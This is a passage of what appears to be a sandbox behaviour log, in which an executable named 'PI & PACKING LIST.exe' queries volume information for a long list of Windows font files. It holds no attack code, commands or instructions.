      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
